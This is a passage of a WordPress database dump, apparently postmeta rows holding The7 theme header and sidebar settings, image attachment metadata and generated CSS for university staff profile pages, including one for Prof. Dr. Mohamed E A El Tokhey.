(24225,3560,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:121;s:6:\"height\";i:182;s:4:\"file\";s:16:\"2023/01/loc1.jpg\";s:8:\"filesize\";i:28790;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"loc1-121x150.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4135;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24226,3559,'_thumbnail_id','3560'),
(24227,3559,'_edit_last','1'),
(24228,3559,'_dt_sidebar_position','disabled'),
(24229,3559,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24230,3559,'_dt_sidebar_hide_on_mobile','0'),
(24231,3559,'_dt_footer_show','1'),
(24232,3559,'_dt_footer_widgetarea_id','sidebar_2'),
(24233,3559,'_dt_footer_hide_on_mobile','0'),
(24234,3559,'_dt_header_title','fancy'),
(24235,3559,'_dt_header_background','normal'),
(24236,3559,'_dt_header_background_below_slideshow','disabled'),
(24237,3559,'_dt_header_transparent_bg_color_scheme','light'),
(24238,3559,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(24239,3559,'_dt_header_transparent_top_bar_bg_opacity','25'),
(24240,3559,'_dt_header_transparent_bg_color','#000000'),
(24241,3559,'_dt_header_transparent_bg_opacity','50'),
(24242,3559,'_dt_header_disabled_background','normal'),
(24243,3559,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24244,3559,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(24245,3559,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(24246,3559,'_dt_header_disabled_transparent_bg_color','#000000'),
(24247,3559,'_dt_header_disabled_transparent_bg_opacity','50'),
(24248,3559,'_dt_page_overrides_top_margin',''),
(24249,3559,'_dt_page_overrides_right_margin',''),
(24250,3559,'_dt_page_overrides_bottom_margin',''),
(24251,3559,'_dt_page_overrides_left_margin',''),
(24252,3559,'_dt_mobile_page_padding_top',''),
(24253,3559,'_dt_mobile_page_padding_right',''),
(24254,3559,'_dt_mobile_page_padding_bottom',''),
(24255,3559,'_dt_mobile_page_padding_left',''),
(24256,3559,'_dt_fancy_header_layout_heading',''),
(24257,3559,'_dt_fancy_header_title_aligment','center'),
(24258,3559,'_dt_fancy_header_height','300'),
(24259,3559,'_dt_fancy_header_padding-top','0px'),
(24260,3559,'_dt_fancy_header_padding-bottom','0px'),
(24261,3559,'_dt_fancy_header_breadcrumbs_heading',''),
(24262,3559,'_dt_fancy_header_breadcrumbs','disabled'),
(24263,3559,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24264,3559,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24265,3559,'_dt_fancy_header_title_heading',''),
(24266,3559,'_dt_fancy_header_title_mode','custom'),
(24267,3559,'_dt_fancy_header_title','Prof. Dr. Mohamed E A El Tokhey'),
(24268,3559,'_dt_fancy_header_title_font_size','30'),
(24269,3559,'_dt_fancy_header_title_line_height','36'),
(24270,3559,'_dt_fancy_header_text_transform','none'),
(24271,3559,'_dt_fancy_header_title_color_mode','color'),
(24272,3559,'_dt_fancy_header_title_color','#ffffff'),
(24273,3559,'_dt_fancy_header_subtitle_heading',''),
(24274,3559,'_dt_fancy_header_subtitle','Former Vice-President of Education and Student Affairs of Ain Shams University'),
(24275,3559,'_dt_fancy_header_subtitle_font_size','18'),
(24276,3559,'_dt_fancy_header_subtitle_line_height','26'),
(24277,3559,'_dt_fancy_header_subtitle_text_transform','none'),
(24278,3559,'_dt_fancy_header_subtitle_color_mode','color'),
(24279,3559,'_dt_fancy_header_subtitle_color','#ffffff'),
(24280,3559,'_dt_fancy_header_bg_heading',''),
(24281,3559,'_dt_fancy_header_bg_color','#222222'),
(24282,3559,'_dt_fancy_header_bg_image_origin','custom'),
(24283,3559,'_dt_fancy_header_bg_image','a:0:{}'),
(24284,3559,'_dt_fancy_header_bg_repeat','no-repeat'),
(24285,3559,'_dt_fancy_header_bg_position_x','center'),
(24286,3559,'_dt_fancy_header_bg_position_y','center'),
(24287,3559,'_dt_fancy_header_bg_fullscreen','1'),
(24288,3559,'_dt_fancy_header_bg_overlay','0'),
(24289,3559,'_dt_fancy_header_overlay_color','#000'),
(24290,3559,'_dt_fancy_header_bg_overlay_opacity','50'),
(24291,3559,'_dt_fancy_header_scroll_effect','default'),
(24292,3559,'_dt_fancy_header_bg_parallax','0.5'),
(24293,3559,'_dt_fancy_header_responsiveness_heading',''),
(24294,3559,'_dt_fancy_header_responsiveness','disabled'),
(24295,3559,'_dt_fancy_header_responsiveness_switch','778px'),
(24296,3559,'_dt_fancy_header_responsive_height','70'),
(24297,3559,'_dt_fancy_header_responsive_font_size','30'),
(24298,3559,'_dt_fancy_header_responsive_title_line_height','38'),
(24299,3559,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24300,3559,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24301,3559,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24302,3559,'_dt_teammate_options_go_to_single','1'),
(24303,3559,'_dt_teammate_options_position',''),
(24304,3559,'_dt_teammate_options_website',''),
(24305,3559,'_dt_teammate_options_mail',''),
(24306,3559,'_dt_teammate_options_facebook',''),
(24307,3559,'_dt_teammate_options_twitter',''),
(24308,3559,'_dt_teammate_options_dribbble',''),
(24309,3559,'_dt_teammate_options_you-tube',''),
(24310,3559,'_dt_teammate_options_rss',''),
(24311,3559,'_dt_teammate_options_delicious',''),
(24312,3559,'_dt_teammate_options_flickr',''),
(24313,3559,'_dt_teammate_options_lastfm',''),
(24314,3559,'_dt_teammate_options_linkedin',''),
(24315,3559,'_dt_teammate_options_vimeo',''),
(24316,3559,'_dt_teammate_options_tumbler',''),
(24317,3559,'_dt_teammate_options_pinterest',''),
(24318,3559,'_dt_teammate_options_devian',''),
(24319,3559,'_dt_teammate_options_skype',''),
(24320,3559,'_dt_teammate_options_github',''),
(24321,3559,'_dt_teammate_options_instagram',''),
(24322,3559,'_dt_teammate_options_stumbleupon',''),
(24323,3559,'_dt_teammate_options_behance',''),
(24324,3559,'_dt_teammate_options_px-500',''),
(24325,3559,'_dt_teammate_options_tripedvisor',''),
(24326,3559,'_dt_teammate_options_vk',''),
(24327,3559,'_dt_teammate_options_foursquare',''),
(24328,3559,'_dt_teammate_options_xing',''),
(24329,3559,'_dt_teammate_options_weibo',''),
(24330,3559,'_dt_teammate_options_odnoklassniki',''),
(24331,3559,'_dt_teammate_options_research-gate',''),
(24332,3559,'_dt_teammate_options_yelp',''),
(24333,3559,'_dt_teammate_options_blogger',''),
(24334,3559,'_dt_teammate_options_soundcloud',''),
(24335,3559,'_dt_teammate_options_viber',''),
(24336,3559,'_dt_teammate_options_whatsapp',''),
(24337,3559,'_dt_teammate_options_reddit',''),
(24338,3559,'_dt_teammate_options_snapchat',''),
(24339,3559,'_dt_teammate_options_telegram',''),
(24340,3559,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24341,2082,'_wp_old_date','2022-11-25'),
(24342,2083,'_wp_old_date','2022-11-25'),
(24343,2346,'_wp_old_date','2022-11-25'),
(24344,2348,'_wp_old_date','2022-11-25'),
(24345,2349,'_wp_old_date','2022-11-25'),
(24346,2350,'_wp_old_date','2022-11-25'),
(24347,2351,'_wp_old_date','2022-11-25'),
(24348,2904,'_wp_old_date','2022-11-25'),
(24349,2084,'_wp_old_date','2022-11-25'),
(24350,2352,'_wp_old_date','2022-11-25'),
(24351,2281,'_wp_old_date','2022-11-25'),
(24352,2353,'_wp_old_date','2022-11-25'),
(24353,2354,'_wp_old_date','2022-11-25'),
(24354,2355,'_wp_old_date','2022-11-25'),
(24355,2282,'_wp_old_date','2022-11-25'),
(24356,2283,'_wp_old_date','2022-11-25'),
(24357,2284,'_wp_old_date','2022-11-25'),
(24358,2921,'_wp_old_date','2022-11-25'),
(24359,2285,'_wp_old_date','2022-11-25'),
(24360,2356,'_wp_old_date','2022-11-25'),
(24361,2357,'_wp_old_date','2022-11-25'),
(24362,2359,'_wp_old_date','2022-11-25'),
(24363,2358,'_wp_old_date','2022-11-25'),
(24364,2286,'_wp_old_date','2022-11-25'),
(24367,3570,'_wp_attached_file','2023/01/loc1-1.jpg'),
(24368,3570,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:121;s:6:\"height\";i:182;s:4:\"file\";s:18:\"2023/01/loc1-1.jpg\";s:8:\"filesize\";i:28790;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"loc1-1-121x150.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4135;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24369,3574,'_wp_attached_file','2023/01/loc1-2.jpg'),
(24370,3574,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:121;s:6:\"height\";i:182;s:4:\"file\";s:18:\"2023/01/loc1-2.jpg\";s:8:\"filesize\";i:28790;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"loc1-2-121x150.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4135;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24373,3577,'_edit_lock','1673732304:1'),
(24374,3577,'_edit_last','1'),
(24375,3577,'_dt_sidebar_position','disabled'),
(24376,3577,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24377,3577,'_dt_sidebar_hide_on_mobile','0'),
(24378,3577,'_dt_footer_show','1'),
(24379,3577,'_dt_footer_widgetarea_id','sidebar_2'),
(24380,3577,'_dt_footer_hide_on_mobile','0'),
(24381,3577,'_dt_header_title','fancy'),
(24382,3577,'_dt_header_background','normal'),
(24383,3577,'_dt_header_background_below_slideshow','disabled'),
(24384,3577,'_dt_header_transparent_bg_color_scheme','light'),
(24385,3577,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(24386,3577,'_dt_header_transparent_top_bar_bg_opacity','25'),
(24387,3577,'_dt_header_transparent_bg_color','#000000'),
(24388,3577,'_dt_header_transparent_bg_opacity','50'),
(24389,3577,'_dt_header_disabled_background','normal'),
(24390,3577,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24391,3577,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(24392,3577,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(24393,3577,'_dt_header_disabled_transparent_bg_color','#000000'),
(24394,3577,'_dt_header_disabled_transparent_bg_opacity','50'),
(24395,3577,'_dt_page_overrides_top_margin',''),
(24396,3577,'_dt_page_overrides_right_margin',''),
(24397,3577,'_dt_page_overrides_bottom_margin',''),
(24398,3577,'_dt_page_overrides_left_margin',''),
(24399,3577,'_dt_mobile_page_padding_top',''),
(24400,3577,'_dt_mobile_page_padding_right',''),
(24401,3577,'_dt_mobile_page_padding_bottom',''),
(24402,3577,'_dt_mobile_page_padding_left',''),
(24403,3577,'_dt_teammate_options_go_to_single','1'),
(24404,3577,'_dt_teammate_options_position',''),
(24405,3577,'_dt_teammate_options_website',''),
(24406,3577,'_dt_teammate_options_mail',''),
(24407,3577,'_dt_teammate_options_facebook',''),
(24408,3577,'_dt_teammate_options_twitter',''),
(24409,3577,'_dt_teammate_options_dribbble',''),
(24410,3577,'_dt_teammate_options_you-tube',''),
(24411,3577,'_dt_teammate_options_rss',''),
(24412,3577,'_dt_teammate_options_delicious',''),
(24413,3577,'_dt_teammate_options_flickr',''),
(24414,3577,'_dt_teammate_options_lastfm',''),
(24415,3577,'_dt_teammate_options_linkedin',''),
(24416,3577,'_dt_teammate_options_vimeo',''),
(24417,3577,'_dt_teammate_options_tumbler',''),
(24418,3577,'_dt_teammate_options_pinterest',''),
(24419,3577,'_dt_teammate_options_devian',''),
(24420,3577,'_dt_teammate_options_skype',''),
(24421,3577,'_dt_teammate_options_github',''),
(24422,3577,'_dt_teammate_options_instagram',''),
(24423,3577,'_dt_teammate_options_stumbleupon',''),
(24424,3577,'_dt_teammate_options_behance',''),
(24425,3577,'_dt_teammate_options_px-500',''),
(24426,3577,'_dt_teammate_options_tripedvisor',''),
(24427,3577,'_dt_teammate_options_vk',''),
(24428,3577,'_dt_teammate_options_foursquare',''),
(24429,3577,'_dt_teammate_options_xing',''),
(24430,3577,'_dt_teammate_options_weibo',''),
(24431,3577,'_dt_teammate_options_odnoklassniki',''),
(24432,3577,'_dt_teammate_options_research-gate',''),
(24433,3577,'_dt_teammate_options_yelp',''),
(24434,3577,'_dt_teammate_options_blogger',''),
(24435,3577,'_dt_teammate_options_soundcloud',''),
(24436,3577,'_dt_teammate_options_viber',''),
(24437,3577,'_dt_teammate_options_whatsapp',''),
(24438,3577,'_dt_teammate_options_reddit',''),
(24439,3577,'_dt_teammate_options_snapchat',''),
(24440,3577,'_dt_teammate_options_telegram',''),
(24441,3578,'_wp_attached_file','2023/01/loc2.jpg'),
(24442,3578,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:129;s:6:\"height\";i:159;s:4:\"file\";s:16:\"2023/01/loc2.jpg\";s:8:\"filesize\";i:30701;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"loc2-129x150.jpg\";s:5:\"width\";i:129;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4903;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24443,3577,'_thumbnail_id','3578'),
(24444,3581,'_edit_lock','1673729290:1'),
(24445,3582,'_wp_attached_file','2023/01/loc3.jpg'),
(24446,3582,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:144;s:6:\"height\";i:195;s:4:\"file\";s:16:\"2023/01/loc3.jpg\";s:8:\"filesize\";i:33789;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"loc3-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4450;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24447,3581,'_thumbnail_id','3582'),
(24448,3581,'_edit_last','1'),
(24449,3581,'_dt_sidebar_position','disabled'),
(24450,3581,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24451,3581,'_dt_sidebar_hide_on_mobile','0'),
(24452,3581,'_dt_footer_show','1'),
(24453,3581,'_dt_footer_widgetarea_id','sidebar_2'),
(24454,3581,'_dt_footer_hide_on_mobile','0'),
(24455,3581,'_dt_header_title','fancy'),
(24456,3581,'_dt_header_background','normal'),
(24457,3581,'_dt_header_background_below_slideshow','disabled'),
(24458,3581,'_dt_header_transparent_bg_color_scheme','light'),
(24459,3581,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(24460,3581,'_dt_header_transparent_top_bar_bg_opacity','25'),
(24461,3581,'_dt_header_transparent_bg_color','#000000'),
(24462,3581,'_dt_header_transparent_bg_opacity','50'),
(24463,3581,'_dt_header_disabled_background','normal'),
(24464,3581,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24465,3581,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(24466,3581,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(24467,3581,'_dt_header_disabled_transparent_bg_color','#000000'),
(24468,3581,'_dt_header_disabled_transparent_bg_opacity','50'),
(24469,3581,'_dt_page_overrides_top_margin',''),
(24470,3581,'_dt_page_overrides_right_margin',''),
(24471,3581,'_dt_page_overrides_bottom_margin',''),
(24472,3581,'_dt_page_overrides_left_margin',''),
(24473,3581,'_dt_mobile_page_padding_top',''),
(24474,3581,'_dt_mobile_page_padding_right',''),
(24475,3581,'_dt_mobile_page_padding_bottom',''),
(24476,3581,'_dt_mobile_page_padding_left',''),
(24477,3581,'_dt_fancy_header_layout_heading',''),
(24478,3581,'_dt_fancy_header_title_aligment','center'),
(24479,3581,'_dt_fancy_header_height','300'),
(24480,3581,'_dt_fancy_header_padding-top','0px'),
(24481,3581,'_dt_fancy_header_padding-bottom','0px'),
(24482,3581,'_dt_fancy_header_breadcrumbs_heading',''),
(24483,3581,'_dt_fancy_header_breadcrumbs','disabled'),
(24484,3581,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24485,3581,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24486,3581,'_dt_fancy_header_title_heading',''),
(24487,3581,'_dt_fancy_header_title_mode','custom'),
(24488,3581,'_dt_fancy_header_title','Dr. ADEL HASSAN EL-SHAZLY'),
(24489,3581,'_dt_fancy_header_title_font_size','30'),
(24490,3581,'_dt_fancy_header_title_line_height','36'),
(24491,3581,'_dt_fancy_header_text_transform','none'),
(24492,3581,'_dt_fancy_header_title_color_mode','color'),
(24493,3581,'_dt_fancy_header_title_color','#ffffff'),
(24494,3581,'_dt_fancy_header_subtitle_heading',''),
(24495,3581,'_dt_fancy_header_subtitle',''),
(24496,3581,'_dt_fancy_header_subtitle_font_size','18'),
(24497,3581,'_dt_fancy_header_subtitle_line_height','26'),
(24498,3581,'_dt_fancy_header_subtitle_text_transform','none'),
(24499,3581,'_dt_fancy_header_subtitle_color_mode','color'),
(24500,3581,'_dt_fancy_header_subtitle_color','#ffffff'),
(24501,3581,'_dt_fancy_header_bg_heading',''),
(24502,3581,'_dt_fancy_header_bg_color','#222222'),
(24503,3581,'_dt_fancy_header_bg_image_origin','custom'),
(24504,3581,'_dt_fancy_header_bg_image','a:0:{}'),
(24505,3581,'_dt_fancy_header_bg_repeat','no-repeat'),
(24506,3581,'_dt_fancy_header_bg_position_x','center'),
(24507,3581,'_dt_fancy_header_bg_position_y','center'),
(24508,3581,'_dt_fancy_header_bg_fullscreen','1'),
(24509,3581,'_dt_fancy_header_bg_overlay','0'),
(24510,3581,'_dt_fancy_header_overlay_color','#000'),
(24511,3581,'_dt_fancy_header_bg_overlay_opacity','50'),
(24512,3581,'_dt_fancy_header_scroll_effect','default'),
(24513,3581,'_dt_fancy_header_bg_parallax','0.5'),
(24514,3581,'_dt_fancy_header_responsiveness_heading',''),
(24515,3581,'_dt_fancy_header_responsiveness','disabled'),
(24516,3581,'_dt_fancy_header_responsiveness_switch','778px'),
(24517,3581,'_dt_fancy_header_responsive_height','70'),
(24518,3581,'_dt_fancy_header_responsive_font_size','30'),
(24519,3581,'_dt_fancy_header_responsive_title_line_height','38'),
(24520,3581,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24521,3581,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24522,3581,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24523,3581,'_dt_teammate_options_go_to_single','1'),
(24524,3581,'_dt_teammate_options_position',''),
(24525,3581,'_dt_teammate_options_website',''),
(24526,3581,'_dt_teammate_options_mail',''),
(24527,3581,'_dt_teammate_options_facebook',''),
(24528,3581,'_dt_teammate_options_twitter',''),
(24529,3581,'_dt_teammate_options_dribbble',''),
(24530,3581,'_dt_teammate_options_you-tube',''),
(24531,3581,'_dt_teammate_options_rss',''),
(24532,3581,'_dt_teammate_options_delicious',''),
(24533,3581,'_dt_teammate_options_flickr',''),
(24534,3581,'_dt_teammate_options_lastfm',''),
(24535,3581,'_dt_teammate_options_linkedin',''),
(24536,3581,'_dt_teammate_options_vimeo',''),
(24537,3581,'_dt_teammate_options_tumbler',''),
(24538,3581,'_dt_teammate_options_pinterest',''),
(24539,3581,'_dt_teammate_options_devian',''),
(24540,3581,'_dt_teammate_options_skype',''),
(24541,3581,'_dt_teammate_options_github',''),
(24542,3581,'_dt_teammate_options_instagram',''),
(24543,3581,'_dt_teammate_options_stumbleupon',''),
(24544,3581,'_dt_teammate_options_behance',''),
(24545,3581,'_dt_teammate_options_px-500',''),
(24546,3581,'_dt_teammate_options_tripedvisor',''),
(24547,3581,'_dt_teammate_options_vk',''),
(24548,3581,'_dt_teammate_options_foursquare',''),
(24549,3581,'_dt_teammate_options_xing',''),
(24550,3581,'_dt_teammate_options_weibo',''),
(24551,3581,'_dt_teammate_options_odnoklassniki',''),
(24552,3581,'_dt_teammate_options_research-gate',''),
(24553,3581,'_dt_teammate_options_yelp',''),
(24554,3581,'_dt_teammate_options_blogger',''),
(24555,3581,'_dt_teammate_options_soundcloud',''),
(24556,3581,'_dt_teammate_options_viber',''),
(24557,3581,'_dt_teammate_options_whatsapp',''),
(24558,3581,'_dt_teammate_options_reddit',''),
(24559,3581,'_dt_teammate_options_snapchat',''),
(24560,3581,'_dt_teammate_options_telegram',''),
(24561,3581,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24562,3583,'_edit_lock','1673729496:1'),
(24563,3584,'_wp_attached_file','2023/01/loc4.jpg'),
(24564,3584,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:173;s:4:\"file\";s:16:\"2023/01/loc4.jpg\";s:8:\"filesize\";i:28671;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"loc4-120x150.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4055;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24565,3583,'_thumbnail_id','3584'),
(24566,3583,'_edit_last','1'),
(24567,3583,'_dt_sidebar_position','disabled'),
(24568,3583,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24569,3583,'_dt_sidebar_hide_on_mobile','0'),
(24570,3583,'_dt_footer_show','1'),
(24571,3583,'_dt_footer_widgetarea_id','sidebar_2'),
(24572,3583,'_dt_footer_hide_on_mobile','0'),
(24573,3583,'_dt_header_title','fancy'),
(24574,3583,'_dt_header_background','normal'),
(24575,3583,'_dt_header_background_below_slideshow','disabled'),
(24576,3583,'_dt_header_transparent_bg_color_scheme','light'),
(24577,3583,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(24578,3583,'_dt_header_transparent_top_bar_bg_opacity','25'),
(24579,3583,'_dt_header_transparent_bg_color','#000000'),
(24580,3583,'_dt_header_transparent_bg_opacity','50'),
(24581,3583,'_dt_header_disabled_background','normal'),
(24582,3583,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24583,3583,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(24584,3583,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(24585,3583,'_dt_header_disabled_transparent_bg_color','#000000'),
(24586,3583,'_dt_header_disabled_transparent_bg_opacity','50'),
(24587,3583,'_dt_page_overrides_top_margin',''),
(24588,3583,'_dt_page_overrides_right_margin',''),
(24589,3583,'_dt_page_overrides_bottom_margin',''),
(24590,3583,'_dt_page_overrides_left_margin',''),
(24591,3583,'_dt_mobile_page_padding_top',''),
(24592,3583,'_dt_mobile_page_padding_right',''),
(24593,3583,'_dt_mobile_page_padding_bottom',''),
(24594,3583,'_dt_mobile_page_padding_left',''),
(24595,3583,'_dt_fancy_header_layout_heading',''),
(24596,3583,'_dt_fancy_header_title_aligment','center'),
(24597,3583,'_dt_fancy_header_height','300'),
